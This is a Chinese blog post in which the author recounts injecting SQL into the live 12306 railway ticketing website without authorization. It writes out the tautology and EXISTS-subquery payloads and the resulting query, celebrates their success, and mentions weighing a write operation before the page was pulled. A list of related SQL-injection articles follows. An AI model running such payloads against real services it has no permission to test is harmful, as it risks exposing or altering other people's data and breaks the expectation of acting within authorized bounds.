玩玩12306的SQL注入漏洞

最新推荐文章于 2021-10-22 04:43:21 发布
最新推荐文章于 2021-10-22 04:43:21 发布
阅读量4.7k 收藏 2
点赞数 3
CC 4.0 BY-SA版权
分类专栏: SQL/noSQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/linvo/article/details/8026373
本文记录了一次12306网站出现的SQL注入漏洞实例,作者通过简单的构造语句验证了漏洞的存在,并展示了如何利用此漏洞进行查询。在作者进一步尝试时,相关页面被迅速下线,随后漏洞得到了修复。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

下午那会儿微博上疯传一张12306的SQL注入漏洞截图:


以前没怎么玩过,那会儿正好有空,所以就上去瞅瞅。

根据trace提示简单构造一个:

' OR '1'='1' OR ZIZ='

注入后的效果应就是:

select * from TB_INFO_CLCS  where flag = 'Y'  and czdm ='G' and cxdm like '%' OR '1'='1' OR ZIZ='%' order by cxdm


果了个然~!成功鸟~!

同理再构造个子查询:

' AND EXISTS (SELECT * FROM TB_INFO_CLCS) OR  ZIZ='

没报错,又成功鸟~!

当我正在考虑是否搞个写操作的时候,铁道部迅速撤下了相关页面:


晚上回家后发现该漏洞已经修复鸟~~~~~~

SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
12306 SQL注入
vagabond1的专栏
09-28 1997
更可笑的最基本的“SQL 注入”都不防止。你用Hibernate 也就罢了,居然不用其对象方法,而是直接拼装 SQL 语句,这要多菜鸟的水平才做得出来啊。测试,框架,规范设计都是作坊式的才写得出来。就是我的开发组都不会犯这样的错误。 Hibernate 虽然开发方便,但是存在严重的效率问题。Hibernate 不适合大数据类型开发是人所共知的事情。 http://www.wooyun.org/
12306曝光sql注入漏洞,我试着发布解决方案
轻轻草原
09-29 244
12306曝光sql注入漏洞,我试着发布解决方案 在项目中,运用Ibatis中Like写法,没有研究下,结果SQL语句存在SQL注入,整理下,下次谨记啊! sql语句: select * from ( select 1 from poll <dynamic prepend= " where " > <isNotEmpty prepend=" and " pr...
吐槽一下12306SQL注入漏洞
weixin_34194379的博客
12-27 162
为什么80%的码农都做不了架构师?>>> ...
12306SQL彻底暴露了你们的水平!
weixin_34082854的博客
09-27 253
1、这么大的数据量,敢用select * 2、还用了Like 3、自重字段,用了字符串类型 4、SQL语句直接抛给前台界面,数据结构泄露 5、SQL直接拼串,完全无视SQL注入 打眼一看,全是BUG,有耐心的筒子们继续补充吧。我还怀疑,他们不会没建索引吧?http://www.oschina.net/code/snippet_580223_14145 转...
CSZ CMS 1.2.X sql注入漏洞
最新发布
09-07
CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS ...
php中sql注入漏洞示例 sql注入漏洞修复
10-26
首先,我们来看SQL注入漏洞是如何形成的。SQL注入是指通过在应用程序中执行恶意SQL代码来控制数据库服务器的一种攻击方式。攻击者可以利用漏洞将特殊构造的SQL语句注入到应用程序中,导致数据库中的数据被非法读取、...
SQL注入漏洞演示源代码
09-29
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过输入恶意的...
SQL注入的一个ASP网站源码
12-29
SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错!
SQL注入攻击演示代码
qiangzhuangchao4049的博客
04-10 1509
数据库截图: package TestJDBC;import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.Statement;/** * sql注入攻击的演示代码 * @author Administrator * */ public class
Pikachu漏洞靶场系列之SQL注入
weixin_45868644的博客
10-22 3481
文章目录1.概述1.1.发生原因1.2.注入点类型1.3.SQL注入流程2.数字型注入(POST)2.1.简易2.2.拓展3.字符型注入(GET)4.搜索型注入4.1.拓展5.XX型注入6.insert/update/delete注入6.1.基于函数报错注入总结 1.概述 1.1.发生原因 Web应用程序对用户输入的合法性没有判断或者过滤不严,用户在输入的字符串之中注入SQL指令,导致这些注入进去的恶意指令被数据库误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 比如我们期望用户输入整数的id,但是
html sql注入_智能化扫描场景分析—精细化扫描SQL注入漏洞
weixin_39695241的博客
11-26 314
SQL注入漏洞,是攻击者对数据库进行攻击的常用手段之一,其本质是攻击者输入的数据可以被当做代码来执行,进而获取到数据库的控制权限。由于危险等级和出现频次常常较高,SQL注入漏洞正无时无刻不受到企业安全人员的重视。先来看以下几组数据。OWASP在2013年和2017年先后发布了两个版本的《Top 10 Web应用程序安全风险报告》,随着Web应用架构和技术的不断发展,应用程序的基础技术和结构发生了重...
转载:SQL注入Mysql
水墨痕迹
06-22 203
SQL注入Mysql(图)时间:2005-09-20 18:49来源:中国网管联盟 bitsCN编辑字体:[大 中 小] 声明   本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有代码均为本人所写,所有数据均经过测试。绝对真实。如果有什么遗漏或错误,欢迎来安全天使论坛(http://www.4ngel.net/forums)和我交流。 前言   2003年开始,喜欢脚本攻击的人...
sqlmap mysql案例_sqlmap简单mysql注入演示附截图
weixin_39986973的博客
01-19 164
安装教程百度一下就有了.首先下载需要的文件,如果是windows环境直接到看大牛的视频,学习一下,附上截图....算是转载吧...只是为了分享一下..下边是实例:sqlmap.py -update 更新-h helpsqlmap.py -u --dbms "Mysql" --current-user/* 注解:获取当前用户名称current user: ...
SQLMASQLMAP中文说明(linux版本)
weixin_34007906的博客
06-22 235
2019独角兽企业重金招聘Python工程师标准>>> ...
sql 截取_某CMS的多处SQL注入审计分析
weixin_39608118的博客
11-26 120
前言某天挖完洞闲来无事浏览CNVD看到某CMS更新了一溜的SQL注入,似乎起了强迫症,于是准备分析学习记录一下,顺便填充一下工作内容(哈哈题外话请忽略),其实是个小众CMS,分析起来也不算难,后台的比较简单,主要看前台的。版本:2.0.2PS:官方已跟新至了最新版本,且在最新版修复了以下漏洞。该文仅作学习和交流。SQL注入1-后台de***.php对应CNVD编号:CNVD-2020-12871漏...
SQL注入攻防入门详解
weixin_30399055的博客
12-01 187
毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱,事实上是没机会接触相关开发……必须的各种借口。这几天把sql注入的相关知识整理了下,希望大家多多提意见。 (对于sql注入的攻防,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避免后知后觉的犯下大错,专门查看大量前辈们的心得,这方面的资料颇多,将其精简出自己觉得重要的,...
SQL注入漏洞实例与防护演示教程
SQL注入漏洞是一种常见的网络安全漏洞,它发生在应用程序的SQL查询中,攻击者可以通过这些漏洞在数据库中执行恶意SQL语句。这些恶意语句可能会破坏数据库的完整性,甚至完全控制服务器。了解SQL注入漏洞的原理以及...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值